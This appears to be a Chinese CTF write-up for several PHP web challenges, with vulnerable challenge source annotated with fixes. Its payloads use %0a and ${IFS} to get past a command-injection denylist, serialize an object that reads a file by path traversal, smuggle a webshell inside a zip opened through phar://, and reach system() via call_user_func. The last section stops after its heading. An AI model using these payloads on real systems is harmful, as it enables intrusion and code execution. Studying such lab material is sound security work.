# family_md5

爆破 md5

if (substr(MD5($_POST['c']), 0, 5) == 'scphp')

写脚本爆破

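<?php
/**
 * Iterated-md5 prefix search.
 *
 * Starting from $seed, repeatedly replace the candidate with its md5 hex digest
 * until a digest begins with $prefix, then return the candidate that produced
 * that digest. Note that each new candidate is the previous *digest*, not an
 * incrementing counter: the result is normally a 32-char hex string (or $seed
 * itself when md5($seed) already matches).
 *
 * @param string $prefix leading hex characters the digest must start with
 * @param string $seed   first candidate tried; the original script started at 1
 * @return string the candidate whose md5 starts with $prefix
 */
function find_md5_prefix_preimage(string $prefix, string $seed = '1'): string
{
    $candidate = $seed;
    $width = strlen($prefix);
    while (true) {
        $digest = md5($candidate);
        // Strict comparison: the original used == which only worked because the
        // prefix is non-numeric; === avoids PHP's numeric-string comparison rules.
        if (substr($digest, 0, $width) === $prefix) {
            return $candidate;
        }
        $candidate = $digest;
    }
}

// The challenge compares the first five hex characters of the digest; the
// original script searched for 'asuej', kept here unchanged.
echo find_md5_prefix_preimage('asuej');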

# easy_rce

<?php
// Challenge "easy_rce": a ping form whose user-supplied ip is passed straight
// into a shell command. The denylist below is the only check before exec().
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    // Denylist of the literal tokens | & ; space / and the words cat, flag,
    // ctfhub. Any byte not listed here reaches the command line unchanged; a
    // denylist is not a substitute for validating the value as an IP address.
    if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
        // Root cause: $ip is interpolated unquoted into the command string.
        // Fix: reject anything that fails filter_var($ip, FILTER_VALIDATE_IP)
        // and wrap the value with escapeshellarg() before building $cmd.
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        // On a denylist hit the matched tokens are echoed back below, which
        // tells the caller exactly which filter fired.
        $res = $m;
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>命令注入-综合</title>
</head>
<body>
<h1>命令注入-综合</h1>
<form action="#" method="GET">
    <label for="ip">IP : </label><br>
    <input type="text" id="ip" name="ip">
    <input type="submit" value="Ping">
</form>
<hr>
<pre>
<?php
// Prints either the exec() output lines or the preg_match_all() match groups.
if ($res) {
    print_r($res);
}
?>
</pre>
<?php
// Deliberately discloses this file's source to the player.
show_source(__FILE__);
?>
</body>
</html>

# 管道符过滤

使用%0a绕过

# 根目录过滤

cd ..  cd .. 一层一层向上

# 空格过滤

${IFS}替换

# cat flag 过滤

反斜杠,引号,通配符都行

# payload

ip=%0acd${IFS}..%0acd${IFS}..%0acd${IFS}..%0atac${IFS}f*

image-20211209214629670

# php 原生类利用

利用 ReadFile 类

O:8:"ReadFile":1:{s:8:"filename";s:16:"../../../../flag";}

image-20211210200225469

# upload_zip

# 源码

<html>
<head>
    <title>上传</title>
</head>
<body>
<!-- ?file=flag.php-->
<form name="form" enctype="multipart/form-data" method="post" action="index.php">
<input type="file" name="file" id="file"></input>
<input type="submit" name="submit" value="上传">
</form>
</body>
</html>
<?php
// Challenge "upload_zip": an image upload handler combined with an
// unrestricted include(). The comments mark where the checks fall short.

// $_GET['file'] is included before any upload handling runs. There is no
// allowlist and no path normalisation, so any path the runtime can open
// (including stream wrappers it supports) is pulled in. Fix: never include a
// caller-supplied path; map a fixed set of keys to known files instead.
$F = $_GET['file'];
include($F);
// $error, $size and $type are read but never checked below.
$error=$_FILES['file']['error'];
$tmpName=$_FILES['file']['tmp_name'];
$name=$_FILES['file']['name'];
$size=$_FILES['file']['size'];
$type=$_FILES['file']['type'];
$time=time();
try{
    // Only the last four bytes of the client-chosen filename are inspected.
    $name1=substr($name,-4);
if(($name1!==".gif") and ($name1!==".jpg"))
{
    echo "<script language=javascript>alert('上传照片只能是JPG或者GIF!')</script>";
    die("错误");
}
// Content sniffing accepts application/zip alongside the two image types, so
// a zip archive carrying a .jpg/.gif name passes both checks. Fix: accept only
// the image types the feature needs and re-encode the image server-side.
if(mime_content_type($tmpName)!=="image/jpeg"&&mime_content_type($tmpName)!=="image/gif"&&mime_content_type($tmpName)!=="application/zip")
{
    echo mime_content_type($tmpName);
    echo "<script language=javascript>alert('上传照片只能是JPG或者GIF!');</script>";
    die("错误");
}
if(is_uploaded_file($tmpName)){
    // Stored under a predictable name (unix timestamp + original extension)
    // inside the web-served uploads/ directory; the name is echoed back below.
    $rootpath='uploads/'.$time.$name1;
    if(!move_uploaded_file($tmpName,$rootpath)){
    echo "<script language='JavaScript'>alert('文件移动失败!');</script>";
    die("错误");
    }
}
echo "图片ID:".$time.$name1;
}
// None of the calls above are shown throwing Exception; failures go through die().
catch(Exception $e)
{
    echo "ERROR";
}
?>

# phar:// 文件上传

虽然正常写也行

先写一句话木马,修改成jpg,  然后压缩为zip文件

image-20211210221332298

burp修改后缀为jpg

image-20211210221412894

最后进行文件包含

phar://uploads/1639145426.jpg/1.jpg           (这个1.jpg是压缩文件内部的源文件)

image-20211210221603423

# fake_news

进去就是phpinfo,可以看到php版本为8.1dev

通过user-agentt进行RCE

image-20211210211132108

# ez_code

# 源码

<?php
// Silences all diagnostics, including the notices this script would otherwise
// emit for undefined variables (e.g. $mod when it is not supplied).
error_reporting(0);
Class HaHa
{
    // Defaults that get merged with caller-supplied data in __construct().
    private $date = ['hello' => 'welcome'];
    /**
     * Merges $data into $this->date and imports every key as a local variable.
     *
     * extract() on request-controlled data lets the caller define $mod (and
     * overwrite any other local), and $mod is then interpolated unescaped into
     * the token string handed to listdata(). Fix: read the needed key
     * explicitly ($data['mod'] ?? null), validate it, and never extract()
     * user input.
     *
     * @param array $data caller-supplied key/value pairs (here: raw $_POST)
     */
    public function __construct($data)
    {
        $this->date = array_merge($this->date, $data);
        extract($this->date);
        // $mod is undefined unless supplied in $data; error_reporting(0) hides the notice.
        $this->listdata("value=list module=$mod");
    }
    /**
     * Parses a space-separated list of key=value tokens.
     *
     * Keys present in $system override the dispatcher settings; every other
     * key lands in $param. Because $mod is embedded without escaping, a value
     * containing spaces contributes extra tokens, so the caller effectively
     * controls both arrays. The "fuck" branch then passes a caller-chosen
     * function name and argument to call_user_func() — arbitrary function
     * execution. Fix: dispatch only through an allowlist of known callables.
     *
     * @param string $_params token string, e.g. "value=list module=..."
     * @return string|void JSON of $this->date for value=list; nothing otherwise
     */
    public function listdata($_params)
    {
        //var_dump($_params);
        $system =
            [
                'can' => 'oh',
                'you' => 'may',
                'give' => 'be',
                'me' => 'you',
                'a' => 'can',
                'value' => 'do',
                '?' => 'it'
            ];
        $_params = trim($_params);
        $params = explode(' ', $_params);
        // Loose in_array(): strict: true would be the safe default.
        if (in_array($params[0], ['list','fuck'])) {
            $params[0] = 'value='.$params[0];
        }
        foreach ($params as $t) {
            // Tokens without '=' yield an empty $var and are skipped below;
            // so is the key "0", since !$var is truthiness-based.
            $var = substr($t, 0, strpos($t, '='));
            $val = substr($t, strpos($t, '=') + 1);
            if (!$var) {
                continue;
            }
            if (isset($system[$var])) {
                $system[$var] = $val;
            } else {
                // $param is only created here; if no such token exists,
                // $param['name'] below evaluates to null.
                $param[$var] = $val;
            }
        }
        switch ($system['value']) {
            case "fuck":
                echo $param['name'];
                // Caller-controlled callable and argument.
                call_user_func($param['name'],$param['youfindit']);
                break;
            case 'list':
                return json_encode($this->date);
        }
    }
}
// Source disclosure for the player, then the trust boundary: the raw POST
// array is handed to the constructor without any filtering.
highlight_file(__FILE__);
$HaHa = new HaHa($_POST);

# 找链

image-20211210214743311

就是说, $system['value'] = "fuck"    $param['name'] = system    $param['youfindit'] = "ls"

image-20211210215134332

# 这不给我整个🐎?

# 源码

<?php
// Challenge: caller-controlled file write under upload/. The filename check
// rejects only the substring "htaccess"; the content check limits what may
// be written.
highlight_file(__FILE__);
error_reporting(0);
$upload = 'upload/';
if (isset($_POST['file'])) {
    // Case-insensitive denylist on the name; nothing normalises the path, so
    // apart from this one substring the stored name is entirely caller-chosen.
    if (preg_match('/htaccess/is', $_POST['file'])) {
        die('?搁这儿干嘛呢?');
    }
    // Content denylist: two or more consecutive word characters, the digits
    // 6/7/8, "<?" and "/". $_POST['content'] is read without isset(); with
    // error_reporting(0) a missing key silently becomes null.
    if (preg_match('#\w{2,}|[678]|<\?|/#', $_POST['content'])) {
        die('你这🐎保绿吗???');
    }
    // Fix: derive the stored name server-side (basename + allowlisted
    // extension), write outside the web root, and never let the client pick
    // the filename or the extension.
    file_put_contents($upload .  $_POST['file'], $_POST['content']);
}

# file_put_contents 特性
